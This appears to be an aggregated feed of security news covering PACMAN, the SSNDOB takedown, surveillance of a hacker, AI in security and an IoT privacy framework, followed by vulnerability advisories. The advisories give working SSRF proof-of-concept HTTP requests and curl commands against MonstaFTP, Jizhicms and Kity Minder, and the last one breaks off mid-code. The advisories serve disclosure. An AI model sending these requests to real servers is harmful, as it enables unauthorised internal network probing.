Plus: Russia rattles its cyber sword, a huge Facebook phishing operation is uncovered, feds take down the SSNDOB marketplace, and more.

How do you smuggle information into the USSR right under the nose of the KGB? Create your own encryption system, of course. That’s exactly what saxophonist and music professor Merryl Goldberg did during the 1980s. This week Goldberg revealed that she used musical notation to hide the names and addresses of activists and details of meetings on a rare trip to the Soviet Union. To do so, she cooked up her own encryption system. Each musical note and marking represented letters of the alphabet and helped disguise the sensitive information. When Soviet officers inspected the documents, no suspicions were raised.

Goldberg’s story was retold at the RSA Conference in San Francisco this week, where WIRED’s Lily Newman has been digging up stories. Also coming out of RSA: a warning that as ransomware becomes less profitable, attackers may turn to business email compromise (BEC) scams to make money—BEC attacks are already highly profitable.

Also this week, dark-web marketplace AlphaBay is about to complete its journey back to the top of the online underworld. The original AlphaBay site—home to more than 350,000 product listings, ranging from drugs to cybercrime services—was purged from the dark web in July 2017 as part of a huge law enforcement operation. However, AlphaBay’s second-in-command, an actor going by the name of DeSnake, survived the law enforcement operation and relaunched the site last year. Now AlphaBay is growing quickly and is on the verge of resuming its dominant dark-web market position.

Elsewhere, Apple held its annual Worldwide Developers Conference this week and revealed iOS 16, macOS Ventura and some new MacBooks—WIRED’s Gear team has you covered on everything Apple announced at WWDC. However, there are two standout new security features worth mentioning: Apple is replacing passwords with new cryptographic passkeys, and it’s introducing a safety check feature to help people in abusive relationships. Database firm MongoDB also held its own event this week, and while it might not have been as high-profile as WWDC, MongoDB’s new Queryable Encryption tool may be a key defense against preventing data leaks.

Also this week we’ve reported on a Tesla flaw that lets anyone create their own NFC car key. New research from the ​​Mozilla Foundation has found that disinformation and hate speech are flooding TikTok ahead of Kenya’s elections, which take place at the start of August. Elon Musk reportedly gained access to Twitter’s “fire hose,” raising privacy concerns. And we dove into the shocking new evidence televised by the House January 6 committee.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

For the past two years, state-sponsored hackers working on behalf of the Chinese government have targeted scores of communications technologies, ranging from home routers to large telecom networks. That’s according to the NSA, FBI, and the Cybersecurity and Infrastructure Security Agency (CISA), which published a security advisory this week detailing the “widespread” hacking.

Since 2020, Chinese-backed actors have been exploiting publicly known software flaws in hardware and incorporating compromised devices into their own attack infrastructure. According to the US agencies, the attacks typically contained five steps. China’s hackers would use publicly available tools to scan for vulnerabilities in networks. They would then gain initial access through online services, access login details from the systems, get access to routers and copy network traffic, before finally “exfiltrating” victim data.

“Exploiting these vulnerabilities has allowed them to establish broad infrastructure networks to exploit a wide range of public- and private-sector targets,” the agencies say in their joint advisory.

Since the start of the war in Ukraine, Russia has been hacked at an unprecedented scale. Now, more than 100 days into the war, tensions around cyber activity are rising. On June 9, Russia’s Foreign Ministry said that its critical infrastructure and government bodies were being hit by cyberattacks and warned that it could lead to military confrontation with the West. “The militarization of the information space by the West, and attempts to turn it into an arena of interstate confrontation, have greatly increased the threat of a direct military clash with unpredictable consequences,” the Foreign Ministry said in a statement. From the moment Russian troops entered Ukraine, questions have been raised about the potential for escalation if people outside of Ukraine are involved in cyberattacks against Russia. Last week, the head of US Cyber Command told _Sky News_ that its military hackers have been involved in offensive operations that support Ukraine.

Phishing remains one of the most successful ways for criminals to break into people’s accounts and make money—and there’s no better example of this than a newly uncovered Facebook and Facebook Messenger phishing campaign. This week, security researchers at US firm PIXM revealed a huge network of at least 400 phishing pages that are raking in millions of views and have made its creators an estimated $59 million. The scam, which has been running since at least September 2021, directs people to false Facebook login pages where their credentials are hoovered up. What stands out, as noted by the Register, is that the phishing campaign has managed to avoid Facebook’s phishing detection methods more effectively than others.

So far in 2022, police and tech companies have been cracking down on cybercriminals with some success: Raidforums, ZLoader, and the dark-web market Hydra have all been shut down in recent months. That list got a little bit longer this week as the FBI and its international law enforcement took down a marketplace selling the personal information of around 24 million Americans, according to authorities. The SSNDOB marketplace, which was made up of four individual domains, was selling people’s names, dates of birth, and Social Security numbers. SSNDOB has existed for around a decade, and in 2013, details obtained from the organization were used in the takeover of Xbox Live accounts. It’s believed the website has made its unknown owners around $22 million since 2015.

How China Hacked US Phone Networks

A novel hardware attack dubbed PACMAN has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.
It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT

A novel hardware attack dubbed **PACMAN** has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.

It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT researchers Joseph Ravichandran, Weon Taek Na, Jay Lang, and Mengjia Yan said in a new paper.

What's more concerning is that "while the hardware mechanisms used by PACMAN cannot be patched with software features, memory corruption bugs can be," the researchers added.

The vulnerability is rooted in pointer authentication codes (PACs), a line of defense introduced in arm64e architecture that aims to detect and secure against unexpected changes to pointers — objects that store a memory address — in memory.

PACs aim to solve a common problem in software security, such as memory corruption vulnerabilities, which are often exploited by overwriting control data in memory (i.e., pointers) to redirect code execution to an arbitrary location controlled by the attacker.

While strategies like Address Space Layout Randomization (ASLR) have been devised to increase the difficulty of performing buffer overflow attacks, the goal of PACs is to ascertain the "validity of pointers with minimal size and performance impact," effectively preventing an adversary from creating valid pointers for use in an exploit.

This is achieved by protecting a pointer with a cryptographic hash — called a Pointer Authentication Code (PAC) — to ensure its integrity. Apple explains PACs as follows -

_Pointer authentication works by offering a special CPU instruction to add a cryptographic signature — or PAC — to unused high-order bits of a pointer before storing the pointer. Another instruction removes and authenticates the signature after reading the pointer back from memory. Any change to the stored value between the write and the read invalidates the signature. The CPU interprets authentication failure as memory corruption and sets a high-order bit in the pointer, making the pointer invalid and causing the app to crash._

But PACMAN "removes the primary barrier to conducting control-flow hijacking attacks on a platform protected using pointer authentication." It combines memory corruption and speculative execution to circumvent the security feature, leaking "PAC verification results via microarchitectural side channels without causing any crashes."

The attack method, in a nutshell, makes it possible to distinguish between a correct PAC and incorrect hash, permitting a bad actor to "brute-force the correct PAC value while suppressing crashes and construct a control-flow hijacking attack on a PA-enabled victim program or operating system."

The crash prevention, for its part, succeeds because each PAC value is speculatively guessed by exploiting a timing-based side channel via the translation look-aside buffer (TLB) using a Prime+Probe attack.

Speculative execution vulnerabilities, as observed in the case of Spectre and Meltdown, weaponize out-of-order execution, a technique that's used to bring about a performance improvement in modern microprocessors by predicting the most likely path of a program's execution flow.

However, it's worth noting that the threat model presumes that there already exists an exploitable memory corruption vulnerability in a victim program (kernel), which, in turn, allows the unprivileged attacker (a malicious app) to inject rogue code into certain memory locations in the victim process.

"This attack has important implications for designers looking to implement future processors featuring pointer authentication, and has broad implications for the security of future control-flow integrity primitives," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

MIT Researchers Discover New Flaw in Apple M1 CPUs That Can't Be Patched

The proof-of-concept attack from MIT CSAIL researchers undermines the pointer authentication feature used to defend the Apple chip's OS kernel.

Security researchers today released details about a new attack they designed against Apple's M1 processor chip that can undermine a key security feature that protects the operating system (OS) kernel from memory corruption attacks. Dubbed PACMAN, the proof-of-concept attack targets ARM Pointer Authentication, a processor hardware feature that's used as a last line of defense against software bugs that can be leveraged to corrupt the content of a memory location, hijack the execution flow of a running program, and ultimately gain complete control of the system.

"The idea behind pointer authentication is that if all else has failed, you still can rely on it to prevent attackers from gaining control of your system," says MIT CSAIL Ph.D. student Joseph Ravichandran, co-lead author of a new paper about PACMAN. "We've shown that pointer authentication as a last line of defense isn't as absolute as we once thought it was."

Lauded as the most powerful chips Apple has ever built, the M1 Pro and M1 Max were rolled out last fall to accolades not only for their power efficiency and performance, but also for the security afforded by the M1 system-on-chip (SoC) architecture.

Among those defenses is pointer authentication, an ARM feature that defends pointer integrity in memory by protecting pointers with a cryptographic hash that verifies they haven't been modified. That hash is called a Pointer Authentication Code (PAC), which the system uses to validate the use of a protected pointer by a program. When the wrong PAC is used, a program will crash. PAC sizes are relatively small, but a straight brute-forcing attack would cause enough crashes to detect malicious behavior — not to mention that a program restart causes the PAC to be refreshed.

The MIT CSAIL team shows that it is possible to use a hardware side-channel attack to brute-force a PAC value and suppress crashes, kicking off a chained attack to ultimately build out a control-flow hijacking attack.

"The key insight of the PACMAN attack is to use speculative execution attacks to leak PAC verification results stealthily via micro-architectural side channels without causing crashes," the paper explains.

Since the attack uses the speculative execution space, it doesn't leave behind traces — and being a hardware attack, it also can't be patched. The work offers a tangible example of how the one-two punch of hardware vulnerabilities and low-level software flaws can provide ample opportunities for attackers to run rampant in the kernel.

**New Tools for Vulnerability Research**

According to MIT professor and paper co-author Mengjia Yan, her team's work offers insight into why software vulnerabilities at the kernel level should still be of concern to developers.

"It's a new way to look at this very long-lasting security threat model. Many other mitigation mechanisms exist that are not well studied under this new compounding threat model, so we consider the PACMAN attack as a starting point," she says. "We hope PACMAN can inspire more work in this research direction in the community."

To encourage researchers to build off of their work, the MIT CSAIL team is releasing two sets of tools that are a product of their work analyzing Apple chips, which are closed source and undocumented.

"We expect these tools to unblock the community from conducting research on existing and future Apple Silicon devices," the paper states, announcing availability of the tools at pacmanattack.com.

Design Weakness Discovered in Apple M1 Kernel Protections

Sabre and Travelport had to report the weekly activities of former “Cardplanet” cybercriminal Aleksei Burkov for two years, info that eventually led to his arrest and prosecution.

Sabre and Travelport had to report the weekly activities of former “Cardplanet” cybercriminal Aleksei Burkov for two years, info that eventually led to his arrest and prosecution.

The U.S. government ordered two travel companies to provide information about the movement of a Russian citizen suspected of hacking. The surveillance data was used as part of an investigation by the U.S. Secret Service, according to court documents recently unsealed.

The revelation of the extent of surveillance that the feds ordered companies to do in a 2015 investigation of Russian hacker Aleksei Burkov once again raises questions of privacy, accountability and responsibility in terms of how much access the government should have to an individual’s private data.

A letter from Forbes prompted the unsealing of court documents in the case Burkov, a now-infamous cybercriminal who at the time of the investigation was suspected of facilitating the theft of $20 million from stolen credit cards on a website called Cardplanet that he was running on the dark web.

The feds arrested Burkov at Ben-Gurion Airport near Tel Aviv in December 2015, and he eventually was extradited to the U.S. in 2019. In January 2020, he pleaded guilty to one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud and money laundering.

Burkov eventually was sentenced to nine years in a federal prison, but mysteriously sent back to Russia in September 2021 for reasons which are still unclear, according to Forbes.

Forbes submitted a legal challenge to unseal documents in the case, which it won, subsequently publishing a report this week on what those documents revealed: extensive surveillance of Burkov by two travel companies, U.S.-based Sabre and U.K.-based Travelport, at the behest of the feds. The government used this data to track Burkov’s movements which eventually led to his arrest and prosecution.

****Tracking Burkov’s Movement****

The court documents show that in November 2015, a judge in the U.S. District Court for the Eastern District of Virginia granted a request by the U.S. government and ordered Sabre and Travelport to provide “all records, services and usages” of Burkov for a two-year period following the issuing of the order. The companies also had to provide a “real time” report on a weekly basis of  Burkov’s account activity to the feds.

The order was granted under the All Writs Act, a broad, 233-year-old law that allows for the government to “issue all writs necessary and appropriate” to aid authorities in their quest for the “proper administration of justice.”

The act is open to interpretation and has already been used a number of times by the U.S. government as a means of forcing tech companies into giving up information to aid them in investigations—a situation the American Civil Liberties Union deems “improper use.”

Indeed, the act has most often been used against tech giants Google and Apple to force them to help the federal government unlock Android devices or iPhones of suspects in criminal cases.

The most high-profile of these cases came after a 2015 mass shooting in San Bernadino, Calif., when Apple held its ground in its refusal to unlock the iPhone of shooter Syed Rizwan Farook. Eventually, the case came to end when the FBI managed to unlock the device without Apple’s help.

****Privacy Issues or Just Cause?****

While privacy advocates believe the federal use of the courts to force tech companies to give up data that customers shared with them in privacy is an overreach, security professionals for the most part support the action in the case of criminal investigations—to a point.

The monitoring of Burkov’s movement to apprehend him was justified due to the criminal nature of his activity, one security professional told Threatpost.

“After reviewing the facts of the case, a federal judge agreed there was enough cause and issued a ruling that authorized this activity,” Rosa Smothers, a former CIA cyber threat analyst and technical intelligence officer and current senior vice president at security firm KnowBe4, wrote in an email to Threatpost. “This was not a case of rogue government officials conducting unapproved data collection.”

Another security professional said that he’s not overly concerned if the federal government uses legal means to get access to private data collected by technology companies. However, it’s not always clear who has access to the “massive troves of data” being collected by companies like Meta and Google, observed John Bambenek, Principal Threat Hunter at security and operations analytics company Netenrich, in an email to Threatpost. This, he said, is concerning and should be remedied.

“Whether its Meta saying they can’t figure out where personal data is being used inside Meta, or law enforcement being able to get real time information on suspects, society just hasn’t come to grips with the implications of surveillance capitalism,” he said.

Feds Forced Travel Firms to Share Surveillance Data on Hacker

AI works best when security professionals and AI are complementing each other.

Artificial intelligence has advanced greatly in the past decade. On my phone, I'm reading Apple and Google news that is well-tailored to me, thanks to AI recommendation models. Self-driving cars are already picking up passengers for rides in downtown San Francisco.

The same transformation is happening in the cybersecurity world too. However, questions remain: Will AI replace security professionals? Or will AI still be as useful in the zero-trust era given that access is tightened to the minimum already?

AI was introduced to the center stage of the cybersecurity industry a few years ago, originally to tackle malware detection and anomaly detection use cases. We have come a long way to better understand both the usefulness and the limitations of applying AI to cybersecurity, especially in the zero-trust era.

**AI Is Still Needed**

First, a zero-trust architecture doesn't remove the need for AI. Though zero trust eliminates the attack surface and reduces the chance for the anomaly to happen, zero trust demands AI more.

Today, an enterprise user's security policy is typically that person's department security policy. Whether users are in a big or a small department, they all follow very similar, if not the same, security policy, including access control policy.

In the zero-trust era, we need a personalized, contextual, dynamic, and granular security policy — which is exactly what zero trust is about. Access control, for instance, is no longer based on simple rules but a set of complex policies based on your identity, your device, your posture, your intention, your risks, your content, and a lot of rich data points.

However, generating such complex, granular, and personalized policy _at scale_ can be very time-consuming if relying on human rules and heuristics. Different employees will use different applications and such application usage may need to evolve fast in a short period of time. AI is a critical technology to make such an intelligent and personalized security policy recommendation at scale.

At the same time, it is impossible for AI to capture or comprehend all the nuances and contexts of any complex environment, so AI may make recommendations that are suboptimal from experts' eyes. With ongoing human feedback, we can improve the AI model and its effectiveness.

**Threat Detection**

Second, zero trust gives the enterprise much tighter protection than it has had in the past, but no matter how tightened things are, there is always a weak link somewhere. Therefore, we want AI to assist with evasive and unknown threat detection and prevention.

Some evasive threats are undetected in time by conventional signature-based or sandbox technology. The SolarWinds supply chain attack is a good example. This global attack turned the SolarWinds Orion software into a weapon, subsequently gaining access to several government systems and thousands of private systems around the world. There was no involvement from any malware by the traditional definition, and it was hard to rely on any single layer of the conventional technology to detect such an attack ahead of time.

AI has a good potential to be the technology to do a better job with unknown threat detection because it can "predict" threats that have never been seen before.

Practically, we will want to layer multiple security technologies along with AI. For instance, in the case of malware, the tried-and-true approach of signature matching and sandbox will continue to play a key role. AI will complement greatly, but not displace, the conventional technology.

**Easily Understood**

Third, enterprise customers want to utilize AI in a way that is easily understood and digestible by security professionals. The "explainable AI" may not improve the AI model efficacy on the surface, but it will increase the adoption of AI significantly.

For instance, AI may be able to detect an unknown threat, but SecOps teams may want to see which family the threat belongs to before taking an action. For another example, AI may be able to generate intelligent and relevant security policy recommendations, but SecOps teams may still want to know the context of why certain recommendations are made before accepting them.

**Conclusion**

The cybersecurity industry needs AI to help reduce unknown attacks at scale and come up with granular and contextual security policies at scale to reduce the attack surface. We want the result to be explainable too.

AI-powered security tools and products are an amazing digital assistant to SecOps professionals. And professionals are assisting AI technology to advance, too, as we will need humans to verify many of the outputs and/or provide feedback for the AI model to improve.

AI is useful to scale the enterprise security functions, like more-intelligent policies and more-intelligent threat detection as discussed above. AI works best when security professionals and AI are complementing each other. In the end, AI is an assistant to security professionals and will not be a replacement for human effort for a long time to come.

How AI Is Useful — and Not Useful — for Cybersecurity

A newly designed privacy-sensitive architecture aims to enable developers to create smart home apps in a manner that addresses data sharing concerns and puts users in control over their personal information. 
Dubbed Peekaboo by researchers from Carnegie Mellon University, the system "leverages an in-home hub to pre-process and minimize outgoing data in a structured and enforceable manner before

A newly designed privacy-sensitive architecture aims to enable developers to create smart home apps in a manner that addresses data sharing concerns and puts users in control over their personal information.

Dubbed **Peekaboo** by researchers from Carnegie Mellon University, the system "leverages an in-home hub to pre-process and minimize outgoing data in a structured and enforceable manner before sending it to external cloud servers."

Peekaboo operates on the principle of data minimization, which refers to the practice of limiting data collection to only what is required to fulfill a specific purpose.

To achieve this the system requires developers to explicitly declare the relevant data collection behaviors in the form of a manifest file that's then fed into an in-home trusted hub to transmit sensitive data from smart home apps such as smart doorbells on a need-to-know basis.

The hub not only functions as a mediator between raw data from IoT devices and the respective cloud services, it also enables third-party auditors to vet an app developer's data collection claims.

The manifest file, for its part, is analogous to Android's "AndroidManifest.xml" file that details the permissions the app needs in order to access protected parts of the system or other apps.

But while it is more of a binary approach in Android where apps are either unilaterally allowed or denied access to a specific feature (e.g., camera), Peekaboo makes it possible to define the data collection practices — the kind of data to be gathered, when it should be carried out, and how frequently.

"With Peekaboo, a user can install a new smart home app by simply downloading a manifest to the hub rather than a binary," the researchers explained.

"This approach offers more flexibility than permissions, as well as a mechanism for enforcement. It also offers users (and auditors) more transparency about a device's behavior, in terms of what data will flow out, at what granularity, where it will go, and under what conditions."

What's more, Peekaboo is also designed to auto-generate live privacy nutrition labels that summarize an app's declared behavior à la Apple's privacy labels in iOS and Android's Data safety section.

"Peekaboo offers a hybrid architecture, where a local user-controlled hub pre-processes smart home data in a structured manner before relaying it to external cloud servers," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Privacy Framework for IoT Devices Gives Users Control Over Data Sharing

MonstaFTP v2.10.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the function performFetchRequest at HTTPFetcher.php.

**SSRF vulnerability in performFetchRequest Function of HTTPFetcher.php File (MonstaFTP v2.10.3 version)****0x01 Affected version**

vendor: https://www.monstaftp.com/

version: v2.10.3

php version: 7.2.x

**0x02 Vulnerability description**

The vulnerable code is located in the performFetchRequest function of the application/api/file_fetch/HTTPFetcher.php file, which does not perform sufficient checksum on the source parameter, leading to a taint from the $context['source'] variable and enters the tainted function curl_setopt, which sends a request to the URL specified by the source parameter after the curl_exec function is executed, eventually leading to an SSRF vulnerability.

Although the vulnerability requires login authentication verification, but because the FTP/SFTP login here is able to login to our own FTP server, so the login field can pass the verification as long as it is set, so as to take advantage of the SSRF vulnerability. So it is equivalent to pre-authentication SSRF, which is more harmful!

private function performFetchRequest() {
    $fp = fopen($this\->tempSavePath, 'w+');
    $ch = curl\_init();
    curl\_setopt($ch, CURLOPT\_URL, $this\->fetchRequest\->getURL());
    curl\_setopt($ch, CURLOPT\_FILE, $fp);
    curl\_setopt($ch, CURLOPT\_FOLLOWLOCATION, true);
    curl\_setopt($ch, CURLOPT\_HEADERFUNCTION, array(&$this\->fetchRequest, 'handleCurlHeader'));
    $success = @curl\_exec($ch);
    $curlError = @curl\_error($ch);
    $effectiveUrl = curl\_getinfo($ch, CURLINFO\_EFFECTIVE\_URL);
    $httpCode = curl\_getinfo($ch, CURLINFO\_HTTP\_CODE);

    curl\_close($ch);
    fclose($fp);

Because the source parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    POST /application/api/api.php HTTP/1.1
    Host: 172.16.119.130
    Content-Length: 275
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.16.119.130
    Referer: http://172.16.119.130/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    request={"connectionType":"sftp","configuration":{"host":"172.16.119.130","remoteUsername":"zero","initialDirectory":"/tmp/","authenticationModeName":"Password","password":"123456","port":22},"actionName":"fetchRemoteFile","context":{"source":"http://172.16.119.1/flag.txt"}}
    

You can also use the following curl command to verify the vulnerability

curl -i -s -k -X $'POST' \\
    -H $'Host: 172.16.119.130' -H $'Accept: application/json, text/plain, \*/\*' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' -H $'Content-Length: 275' \\
    --data-binary $'request={\\"connectionType\\":\\"sftp\\",\\"configuration\\":{\\"host\\":\\"172.16.119.130\\",\\"remoteUsername\\":\\"zero\\",\\"initialDirectory\\":\\"/tmp/\\",\\"authenticationModeName\\":\\"Password\\",\\"password\\":\\"123456\\",\\"port\\":22},\\"actionName\\":\\"fetchRemoteFile\\",\\"context\\":{\\"source\\":\\"http://172.16.119.1/flag.txt\\"}}' \\
    $'http://172.16.119.130/application/api/api.php'

**0x03 Acknowledgement**

Ez Wang, W Xie, Yf Gao, Zh Wang, Lj Wu

CVE-2022-31827: CVE_Request/MonstaFTP_v2_10_3_SSRF.md at master · zer0yu/CVE_Request

Jizhicms v2.2.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via the Update function in app/admin/c/TemplateController.php.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: 2.2.5  
Test with PHP 7.2

The vulnerable code is located in the update function of the app/admin/c/TemplateController.php file, which fails to validate the download\_url parameter, causing a taint flow from the source $remote_url variable into the sink function fopen. This eventually leads to an SSRF vulnerability that can send a request to the URL specified by the download\_url parameter.

function update(){
	$template = $this\->frparam('template',1);
	if(strpos($template,'.')!==false){
		JsonReturn(array('code'\=>1,'msg'\=>JZLANG('参数存在安全隐患！')));
	}
    $this\->template\_name = $template;
	$dir = APP\_PATH.'static';
	if($template){
		if($this\->frparam('action',1)){
			$action = $this\->frparam('action',1);
			// 自己获取这些信息
			$remote\_url  = urldecode($this\->frparam('download\_url',1));
			$remote\_url = strpos($remote\_url,'?')!==false ? $remote\_url.'&version='.$this\->webconf\['web\_version'\] : $remote\_url.'?version='.$this\->webconf\['web\_version'\];
			$file\_size   = $this\->frparam('filesize',1);
			$tmp\_path    = Cache\_Path."/update\_".$filepath.".zip";//临时下载文件路径
			switch ($action) {
			......
			    case 'start-download':
			        // 这里检测下 tmp\_path 是否存在
			        try {
			            set\_time\_limit(0);
			            touch($tmp\_path);
			            if ($fp = fopen($remote\_url, "rb")) {
			                if (!$download\_fp = fopen($tmp\_path, "wb")) {
			                    exit;
			                }
			                while (!feof($fp)) {
			                    if (!file\_exists($tmp\_path)) {
			                        // 如果临时文件被删除就取消下载
			                        fclose($download\_fp);
			                        exit;
			                    }
			                    fwrite($download\_fp, fread($fp, 1024 \* 8 ), 1024 \* 8);
			                }
			                fclose($download\_fp);
			                fclose($fp);
			            } else {
			                exit;
			            }
			        } catch (Exception $e) {
			            Storage::remove($tmp\_path);
			            JsonReturn(\['code'\=>1,'msg'\=>JZLANG('发生错误').'：'.$e\->getMessage()\]);
			        }

			        JsonReturn(\['code'\=>0,'tmp\_path'\=>$tmp\_path\]);
			        break;

Because the download\_url parameter is not restricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows:

    POST /index.php/admins/Template/update.html HTTP/1.1
    Host: 172.16.119.130
    Content-Length: 73
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://172.16.119.130
    Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
    Connection: close
    
    action=start-download&template=cms&download_url=http://localhost/startpoc
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.130' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' -H $'Content-Length: 73' \
        -b $'think_var=zh-cn; PHPSESSID=g3e5nupqb19trokgr9msul8d9l' \
        --data-binary $'action=start-download&template=cms&download_url=http://localhost/startpoc' \
        $'http://172.16.119.130/index.php/admins/Template/update.html'
    

We can then see the corresponding request in the apache server logs, which proves that the SSRF vulnerability can be triggered

CVE-2022-31390: [Vuln] SSRF vulnerability in `update` Function of `TemplateController.php` File when `$action` is `start-download` (2.2.5 version) · Issue #75 · Cherry-toto/jizhicms

Kity Minder v1.3.5 was discovered to contain a Server-Side Request Forgery (SSRF) via the init function at ImageCapture.class.php.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: v1.3.5  
Test with PHP 7.2

The vulnerable code is located in the init function of the native-support/archive/src/ImageCapture.class.php file, which does not sufficiently validate the image parameter, leading to a taint introduced from the native-support/export.php file in the $_REQUEST['data'] variable in the native-support/export.php file and eventually enters the tainted function curl_init, which, after the curl_exec function is executed, sends a request to the URL specified by the image parameter, eventually leading to an SSRF vulnerability.

The function call path is as follows.

    file: native-support/export.php 
    code: $file = Parser::toXMind( $_REQUEST['data'] );
    
    file: native-support/archive/src/Parser.class.php
    code: return XMindParser::parse( htmlspecialchars( $source, ENT_NOQUOTES ), $previewImage );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: $data = self::doParse( $sourceJSON );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: 'topic' => self::parseTopic( $source, $attachments )
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: self::parseImage( $source, $attachments );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: $image = ImageCapture::capture( $source[ 'data' ][ 'image' ] );
    
    file: native-support/archive/src/ImageCapture.class.php
    code: $curl = self::init( $url );
    

The vulnerable function init

private static function init ( $url ) {

    $curl = curl\_init( $url );

    curl\_setopt( $curl, CURLOPT\_AUTOREFERER, true );
    curl\_setopt( $curl, CURLOPT\_FOLLOWLOCATION, true );
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, true );
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, true );

    // 尝试连接时间 10s
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, 10 \* 1000 );
    curl\_setopt( $curl, CURLOPT\_MAXREDIRS, 5 );
    curl\_setopt( $curl, CURLOPT\_TIMEOUT, 30 );

    return $curl;

}

Because the image parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    POST /export.php HTTP/1.1
    Host: 172.16.119.1:81
    Content-Length: 64
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.16.119.1:81
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.16.119.1:81/export.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    type=xmind&data={"data":{"image":"http://172.16.119.1/testpoc"}}
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.1:81' -H $'Content-Length: 64' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
        --data-binary $'type=xmind&data={\"data\":{\"image\":\"http://172.16.119.1/testpoc\"}}' \
        $'http://172.16.119.1:81/export.php'

CVE-2022-31830: [Vuln] SSRF vulnerability in `init` Function of `ImageCapture.class.php` File (Kity Minder v1.3.5 version) · Issue #345 · fex-team/kityminder

Jizhicms v2.2.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via the Index function in app/admin/c/PluginsController.php.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: 2.2.5  
Test with PHP 7.2

The vulnerable code is located in the index function of the app/admin/c/PluginsController.php file, which fails to validate the webapi parameter, leading to a taint introduced from the $webapi variable into the tainted function curl_setopt, and after the curl_exec function is executed, it sends a request to the URL specified by the webapi parameter, eventually leading to an SSRF vulnerability. However, this vulnerability is triggered in two stages, first by passing the set parameter to reset the webapi section of the plugins_config field in sysconfig. The SSRF vulnerability is then triggered when the function is triggered again and without any parameter values.

public function index(){
	//检查更新链接是否可以访问
	$webapi = $this\->webconf\['plugins\_config'\];
	if(!$webapi){
		$webapi = 'http://api.jizhicms.cn/plugins.php';
		if(!M('sysconfig')->find(\['field'\=>'plugins\_config'\])){
			M('sysconfig')->add(\['title'\=>JZLANG('插件配置'),'field'\=>'plugins\_config','type'\=>2,'data'\=>$webapi,'typeid'\=>0\]);
			setCache('webconfig',null);
		}
	}
	if($this\->frparam('set')){
        if($this\->admin\['isadmin'\]!=1){
            JsonReturn(\['code'\=>1,'msg'\=>JZLANG('非超级管理员无法设置！')\]);
        }
		$webapi = $this\->frparam('webapi',1);
		M('sysconfig')->update(\['field'\=>'plugins\_config'\],\['data'\=>$webapi\]);
		setCache('webconfig',null);
		JsonReturn(\['code'\=>0,'msg'\=>'配置成功！'\]);
	}
	$this\->webapi = $webapi;
	$api = $webapi.'?version='.$this\->webconf\['web\_version'\];
	$ch = curl\_init();
	$timeout = 5;
	curl\_setopt($ch,CURLOPT\_FOLLOWLOCATION,1);
	curl\_setopt($ch,CURLOPT\_RETURNTRANSFER,1);
	curl\_setopt($ch, CURLOPT\_HEADER, false);
	curl\_setopt ($ch, CURLOPT\_CONNECTTIMEOUT, $timeout);
	curl\_setopt($ch,CURLOPT\_URL,$api);
	$res = curl\_exec($ch);
	$httpcode = curl\_getinfo($ch,CURLINFO\_HTTP\_CODE);
	curl\_close($ch);

